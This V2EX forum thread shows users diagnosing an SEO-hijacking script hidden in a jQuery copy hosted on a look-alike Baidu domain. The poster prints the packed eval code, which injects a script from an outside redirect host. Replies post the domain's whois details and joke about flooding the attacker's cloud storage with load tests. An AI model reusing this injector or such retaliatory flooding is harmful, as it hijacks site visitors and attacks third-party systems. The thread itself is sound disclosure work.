这个前端劫持脚本是哪位大神放的?麻烦认领一下! - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
请不要在回答技术问题时复制粘贴 AI 生成的内容
TrustOcean

这个前端劫持脚本是哪位大神放的?麻烦认领一下!

  •  
  •   TrustOcean Oct 5, 2018 6607 views
    This topic created in 2761 days ago, the information mentioned may be changed or developed.

    做法很高明呀,只有在外站链入到站点的时候才会发生跳转,搜索引擎的所有链入链接也都被劫持走了。直接访问网站却看不出丝毫问题。 这相似的链接.... 排查了 10 分钟才找出来!

    16 replies    2019-03-20 19:36:24 +08:00
    ues
        1
    ues  
       Oct 5, 2018 via Android
    安全浏览器应该提示风险
    zjsxwc
        2
    zjsxwc  
       Oct 5, 2018
    公用的 js 也投毒, 233333333333

    不过域名是百度的,没准它就是不想别人免费用它的 js 也说不定
    azh7138m
        3
    azh7138m  
       Oct 5, 2018
    @zjsxwc 域名不一样的,一个是 baidu.com ,另一个是 libs-baidu.com
    dot2017
        4
    dot2017  
       Oct 5, 2018
    baidu555556666.oss-cn-hongkong/aliyuncs/com
    哪位大佬 DD 一下让他的 OSS 账单撑爆掉
    23f0baf3
        5
    23f0baf3  
       Oct 5, 2018
    @zjsxwc 那个域名是 libs-baidu.com ,个人注册的,估计是个做黑厂的。whois 信息:
    Name:zhengxianbang
    Organization:zhengxianbang
    Street:yongjiaxian,yongjiaxian,kunyangxiang,zhengshancun
    City:beijing
    State:zhejiangsheng
    Postal Code:325100
    Country:CN
    Phone:+86.57788888888
    Fax:+86.57788888888
    Email:[email protected]
    emCupid
        6
    emCupid  
       Oct 5, 2018
    唉,提速降费是惠民了,位是运营商劫持也更变本加厉了
    flowfire
        7
    flowfire  
       Oct 5, 2018 via iPhone
    https 怎么劫持?
    lotmany
        8
    lotmany  
       Oct 5, 2018 via iPhone
    只看到域名不一样 并没发现什么劫持,跳转等其他不妥
    changwei
        9
    changwei  
       Oct 6, 2018
    同上,就一截,除了域名不同以外,看出代有什。然我知道他做肯定有。
    TrustOcean
        10
    TrustOcean  
    OP
       Oct 6, 2018
    @flowfire
    @sunsulei
    @changwei

    通过 tool.lu/js 的解码:
    前者 JQ 脚本多出了一段加密后的 JS

    eval(function(p, a, c, k, e, d) {
    e = function(c) {
    return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
    while (c--) d[e(c)] = k[c] || e(c);
    k = [function(e) {
    return d[e]
    }];
    e = function() {
    return '\\w+'
    };
    c = 1;
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p;
    }('4.5("<0 6=\\\'1/2\\\' 3=\\\'7://b.c.d/8?9=a\\\'></0>");', 14, 14, 'script|text|Javascript|src|document|writeln|type|https|safe|lx|lhc|www|05fu|com'.split('|'), 0, {}))

    这一段引用了一个外站的跳转代码。
    PS:只有当附带 refer 的情况下才会 GET 到真实跳转代码,否则报 404.
    LGA1150
        11
    LGA1150  
       Oct 6, 2018
    @dot2017 wrk 10000 并发压测中
    lotmany
        12
    lotmany  
       Oct 6, 2018 via iPhone
    @LGA1150 小心被实名。。
    lotmany
        13
    lotmany  
       Oct 6, 2018 via iPhone
    @TrustOcean 看不懂。。。不过也没必要看懂,冲着这个域名基本上就不是正常玩法
    LGA1150
        14
    LGA1150  
       Oct 7, 2018
    @sunsulei 吓得我赶紧停了
    franklinyu
        15
    franklinyu  
       Oct 7, 2018
    完全另一域名 libs-baidu.com ,不用不就完了
    huasec
        16
    huasec  
       Mar 20, 2019
    我的代码那么简单,都看不出来,真笨!
    About     Help     Advertise     Blog     API     FAQ     Solana     6064 Online   Highest 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 51ms UTC 02:07 PVG 10:07 LAX 19:07 JFK 22:07
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86